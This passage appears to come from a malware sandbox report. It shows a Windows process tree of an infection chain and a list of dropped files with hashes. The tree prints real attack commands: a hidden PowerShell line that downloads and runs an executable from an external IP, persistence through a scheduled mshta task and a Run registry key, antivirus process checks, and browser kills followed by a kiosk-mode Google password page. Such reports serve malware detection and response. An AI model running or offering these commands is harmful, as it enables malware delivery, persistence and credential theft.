                                                            • Downloads MZ/PE file
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4640
                                                            • C:\Users\Admin\AppData\Local\TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE
                                                              "C:\Users\Admin\AppData\Local\TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE"
                                                              9⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5492
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10342660121\am_no.cmd" "
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:736
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 2
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Delays execution with timeout.exe
                                                          PID:2792
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6204
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:6208
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6936
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:6588
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5388
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:364
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn "7KuCAmaEW68" /tr "mshta \"C:\Temp\vMLHaPweU.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:6964
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta "C:\Temp\vMLHaPweU.hta"
                                                          7⤵
                                                          • Checks computer location settings
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6984
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                            8⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Downloads MZ/PE file
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:7092
                                                            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                              9⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3872
                                                      • C:\Users\Admin\AppData\Local\Temp\10342740101\kDveTWY.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10342740101\kDveTWY.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:3336
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1184
                                                      • C:\Users\Admin\AppData\Local\Temp\10342750101\dBSGwVB.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10342750101\dBSGwVB.exe"
                                                        6⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:7848
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:7932
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                            8⤵
                                                            • Adds Run key to start application
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3256
                                                          • C:\Users\Public\Netstat\bild.exe
                                                            C:\Users\Public\Netstat\bild.exe
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:8144
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:8196
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                            8⤵
                                                            • Adds Run key to start application
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2212
                                                          • C:\Users\Public\Netstat\bild.exe
                                                            C:\Users\Public\Netstat\bild.exe
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:8440
                                                      • C:\Users\Admin\AppData\Local\Temp\10342760101\WLbfHbp.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10342760101\WLbfHbp.exe"
                                                        6⤵
                                                          PID:8948
                                                          • C:\Windows\SysWOW64\CMD.exe
                                                            "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                            7⤵
                                                              PID:9180
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                PID:5464
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /I "opssvc wrsa"
                                                                8⤵
                                                                  PID:624
                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                  tasklist
                                                                  8⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:8672
                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                  8⤵
                                                                    PID:8680
                                                              • C:\Users\Admin\AppData\Local\Temp\10342770101\f73ae_003.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10342770101\f73ae_003.exe"
                                                                6⤵
                                                                  PID:10460
                                                                • C:\Users\Admin\AppData\Local\Temp\10342780101\TbV75ZR.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10342780101\TbV75ZR.exe"
                                                                  6⤵
                                                                    PID:11820
                                                                    • C:\Windows\SysWOW64\CMD.exe
                                                                      "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                                      7⤵
                                                                        PID:4916
                                                                    • C:\Users\Admin\AppData\Local\Temp\10342790101\7IIl2eE.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10342790101\7IIl2eE.exe"
                                                                      6⤵
                                                                        PID:12452
                                                                        • C:\Windows\SysWOW64\CMD.exe
                                                                          "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                          7⤵
                                                                            PID:4532
                                                                        • C:\Users\Admin\AppData\Local\Temp\10342800101\BIm18E9.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10342800101\BIm18E9.exe"
                                                                          6⤵
                                                                            PID:13064
                                                                          • C:\Users\Admin\AppData\Local\Temp\10342810101\264e01b6dd.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10342810101\264e01b6dd.exe"
                                                                            6⤵
                                                                              PID:7380
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                7⤵
                                                                                  PID:4456
                                                                              • C:\Users\Admin\AppData\Local\Temp\10342820101\0ad49163a4.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10342820101\0ad49163a4.exe"
                                                                                6⤵
                                                                                  PID:11896
                                                                                • C:\Users\Admin\AppData\Local\Temp\10342830101\8e18d803cf.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10342830101\8e18d803cf.exe"
                                                                                  6⤵
                                                                                    PID:7616
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10342840101\63fc3de9ef.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10342840101\63fc3de9ef.exe"
                                                                                    6⤵
                                                                                      PID:8020
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /F /IM firefox.exe /T
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:1388
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /F /IM chrome.exe /T
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:8384
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /F /IM msedge.exe /T
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:8612
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /F /IM opera.exe /T
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:8992
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /F /IM brave.exe /T
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:8200
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                        7⤵
                                                                                          PID:8976
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                            8⤵
                                                                                              PID:8776
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {3e87dc8c-9aad-42a1-b6a9-6ea6de7870ab} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                9⤵
                                                                                                  PID:9460
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {af987b35-f9a6-4ada-b9f2-dd9a86257a1c} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                  9⤵
                                                                                                    PID:9748
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3832 -initialChannelId {a86efbc5-c64f-4202-a3c7-9ea04ff474b9} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                    9⤵
                                                                                                      PID:10184
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4016 -prefsLen 27276 -prefMapHandle 4020 -prefMapSize 270279 -ipcHandle 4088 -initialChannelId {e1193455-d233-424b-bc7f-0be634c81885} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                      9⤵
                                                                                                        PID:10228
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4368 -prefsLen 34775 -prefMapHandle 4372 -prefMapSize 270279 -jsInitHandle 4376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3172 -initialChannelId {3af77354-927f-484f-8b10-bedd3de4bb2d} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                        9⤵
                                                                                                          PID:10464
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4828 -prefsLen 35012 -prefMapHandle 4832 -prefMapSize 270279 -ipcHandle 4836 -initialChannelId {bab7afa3-ecad-4428-984a-663a7042fdfa} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                          9⤵
                                                                                                            PID:12832
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3196 -prefsLen 32952 -prefMapHandle 3200 -prefMapSize 270279 -jsInitHandle 3204 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5324 -initialChannelId {785598e0-60cf-47fb-8f52-c0c9536f6f99} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                            9⤵
                                                                                                              PID:4228
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5632 -prefsLen 32952 -prefMapHandle 5636 -prefMapSize 270279 -jsInitHandle 5640 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5040 -initialChannelId {fad19e34-8231-44cd-ac7f-b66f531a651b} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                              9⤵
                                                                                                                PID:2992
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2940 -prefsLen 32952 -prefMapHandle 4644 -prefMapSize 270279 -jsInitHandle 4716 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5792 -initialChannelId {6e66a41d-8f09-4c54-8edb-4755a9acaf85} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                9⤵
                                                                                                                  PID:7224
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10342850101\619508d49c.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10342850101\619508d49c.exe"
                                                                                                            6⤵
                                                                                                              PID:9120
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10342860101\516e884ed1.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10342860101\516e884ed1.exe"
                                                                                                              6⤵
                                                                                                                PID:12480
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10342870101\ed16798d4a.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10342870101\ed16798d4a.exe"
                                                                                                                6⤵
                                                                                                                  PID:7096
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                        1⤵
                                                                                                          PID:1672
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                          1⤵
                                                                                                            PID:4072
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{64eff226-89a5-4d48-b10a-3d34114edaeb}\2b6154e6-d58e-4ad5-b334-e7e691a719e2.cmd"0
                                                                                                            1⤵
                                                                                                              PID:5560
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                              1⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:5896
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Public\Netstat\bild.exe
                                                                                                              1⤵
                                                                                                                PID:11368
                                                                                                                • C:\Users\Public\Netstat\bild.exe
                                                                                                                  C:\Users\Public\Netstat\bild.exe
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:11568
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 13116 -ip 13116
                                                                                                                1⤵
                                                                                                                  PID:13012
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Public\Netstat\bild.exe
                                                                                                                  1⤵
                                                                                                                    PID:4240
                                                                                                                    • C:\Users\Public\Netstat\bild.exe
                                                                                                                      C:\Users\Public\Netstat\bild.exe
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:8252
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Public\Netstat\bild.exe
                                                                                                                    1⤵
                                                                                                                      PID:8420
                                                                                                                      • C:\Users\Public\Netstat\bild.exe
                                                                                                                        C:\Users\Public\Netstat\bild.exe
                                                                                                                        2⤵
                                                                                                                          PID:8528
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                        1⤵
                                                                                                                          PID:4620

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_a674896ea_arkmon.sys

                                                                                                                          Filesize

                                                                                                                          390KB

                                                                                                                          MD5

                                                                                                                          7c924dd4d20055c80007791130e2d03f

                                                                                                                          SHA1

                                                                                                                          072f004ddcc8ddf12aba64e09d7ee0ce3030973e

                                                                                                                          SHA256

                                                                                                                          406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

                                                                                                                          SHA512

                                                                                                                          ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

                                                                                                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                                                                                          Filesize

                                                                                                                          1.9MB

                                                                                                                          MD5

                                                                                                                          acb40d712d1158cde87a02cb4f16b4d4

                                                                                                                          SHA1

                                                                                                                          1d2d469b6694306de77879f0c78b024c2847f8ac

                                                                                                                          SHA256

                                                                                                                          93a5dc1be8f236795c111d119ba8d2255371205b34bba51c92551076ce927c1a

                                                                                                                          SHA512

                                                                                                                          586ac2e752c9dfacf5d49ba4fcd1ca497ea919d427547fdc38b0245bbfffb5cfcf3237c24411ff9df2d61f9365eebc9fc7cdfe7743f5e8d34a578a122005a80e

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                          MD5

                                                                                                                          91151dac82e95a1ac490dc321e5a5cbb

                                                                                                                          SHA1

                                                                                                                          7680ffc12f418f6605482de24c549fbf4e7ab792

                                                                                                                          SHA256

                                                                                                                          7d605870b1bebd3f69e0e571345e2cea3e7d9674294c1342c1f6902e99e17c57

                                                                                                                          SHA512

                                                                                                                          487b8cf861637c780528a1867de4de052c710b04b71deea1440f0a45a90e975cff493f6828b2c50f3827ca150b4ab88a88bc738481df83b4732f06ed819e7033

                                                                                                                        • C:\Users\Admin\AppData\Local\TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE

                                                                                                                          Filesize

                                                                                                                          1.8MB

                                                                                                                          MD5

                                                                                                                          c3f83f2cb10b8e3be2613d9823b9b533

                                                                                                                          SHA1

                                                                                                                          96441997a25a1b70f792c99a2528b79a8162d1a9

                                                                                                                          SHA256

                                                                                                                          fe6553869cc3c7e56b673a30b9e977acee40ba8efa2f74b2b5a9b181fc49ff20

                                                                                                                          SHA512

                                                                                                                          5c27b4a2ca26ddc3778d580f81334867c6f06b98747ff4370ce32678b7dbf0342498e3275b7d47652f09452dac703e465c5e6684f2be1d9488ec0263cf372427

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe

                                                                                                                          Filesize

                                                                                                                          1.3MB

                                                                                                                          MD5

                                                                                                                          eb880b186be6092a0dc71d001c2a6c73

                                                                                                                          SHA1

                                                                                                                          c1c2e742becf358ace89e2472e70ccb96bf287a0

                                                                                                                          SHA256

                                                                                                                          e4e368cac17981db7fbd37b415ee530900179f1c73aa7fad0e169fcc022e8f00

                                                                                                                          SHA512

                                                                                                                          b6b9fad4e67df75c8eea8702d069cc1df0b8c5c3f1386bc369e09521cbf4e8e6b4c08102ceea5ca40509bf0593c6c21b54acf9b8c337bff6aa1f3afc69d0f96e

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe

                                                                                                                          Filesize

                                                                                                                          1.2MB

                                                                                                                          MD5

                                                                                                                          7d842fd43659b1a8507b2555770fb23e

                                                                                                                          SHA1

                                                                                                                          3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

                                                                                                                          SHA256

                                                                                                                          66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

                                                                                                                          SHA512

                                                                                                                          d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10340260101\c4ab00aec8.exe

                                                                                                                          Filesize

                                                                                                                          1.8MB

                                                                                                                          MD5

                                                                                                                          cddd1902d8f49babe494f365667c058a

                                                                                                                          SHA1

                                                                                                                          ed01b4eb4bf470d8a6895aeb5f4850991b8840c6

                                                                                                                          SHA256

                                                                                                                          10fbeafc5af0200d9b8cf6c8dd98f224f74bb2ecb5b4bc3354594935d35d70ed

                                                                                                                          SHA512

                                                                                                                          e21b0c9c04f94cb4c124968fcf9851e7d8a80a714d52436424cf7e2a2191ebc36ee6152b2a7b765b33bd2220cd340c69825775adccf616c15e27e06c6c5e80d7

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe

                                                                                                                          Filesize

                                                                                                                          1.4MB

                                                                                                                          MD5

                                                                                                                          49e9b96d58afbed06ae2a23e396fa28f

                                                                                                                          SHA1

                                                                                                                          3a4be88fa657217e2e3ef7398a3523acefc46b45

                                                                                                                          SHA256

                                                                                                                          4d0f0f1165c992c074f2354604b4ee8e1023ba67cb2378780313e4bb7e91c225

                                                                                                                          SHA512

                                                                                                                          cd802e5717cf6e44eaa33a48c2e0ad7144d1927d7a88f6716a1b775b502222cc358d4e37bdbd17ebe37e0d378bb075463bce27619b35d60b087c73925a44a6d4

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe

                                                                                                                          Filesize

                                                                                                                          4.9MB

                                                                                                                          MD5

                                                                                                                          c909efcf6df1f5cab49d335588709324

                                                                                                                          SHA1

                                                                                                                          43ace2539e76dd0aebec2ce54d4b2caae6938cd9

                                                                                                                          SHA256

                                                                                                                          d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

                                                                                                                          SHA512

                                                                                                                          68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe

                                                                                                                          Filesize

                                                                                                                          327KB

                                                                                                                          MD5

                                                                                                                          f0676528d1fc19da84c92fe256950bd7

                                                                                                                          SHA1

                                                                                                                          60064bc7b1f94c8a2ad24e31127e0b40aff40b30

                                                                                                                          SHA256

                                                                                                                          493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32

                                                                                                                          SHA512

                                                                                                                          420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe

                                                                                                                          Filesize

                                                                                                                          13.1MB

                                                                                                                          MD5

                                                                                                                          79a51197969dadee0226635f5977f6ab

                                                                                                                          SHA1

                                                                                                                          1785a081523553690d110c4153e3b3c990c08d45

                                                                                                                          SHA256

                                                                                                                          868c78f267862af83cf94c9d21615d9c01afe3dbd0da02dc96bbc3a956ccc48d

                                                                                                                          SHA512

                                                                                                                          202ea6d421bb7163ba741267543dff4f97012f2489f694f06555b1bbffec3a59fe71d5675755f5d746727eaf93b6d8204eab4e11fd692cf82570b1edf8a80a55

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe

                                                                                                                          Filesize

                                                                                                                          1.4MB

                                                                                                                          MD5

                                                                                                                          fc6cd346462b85853040586c7af71316

                                                                                                                          SHA1

                                                                                                                          fd2e85e7252fb1f4bfba00c823abed3ec3e501e1

                                                                                                                          SHA256

                                                                                                                          5a967613fad14a8eb61757b641eb3f84236360e06834800e90e2e28da09da2de

                                                                                                                          SHA512

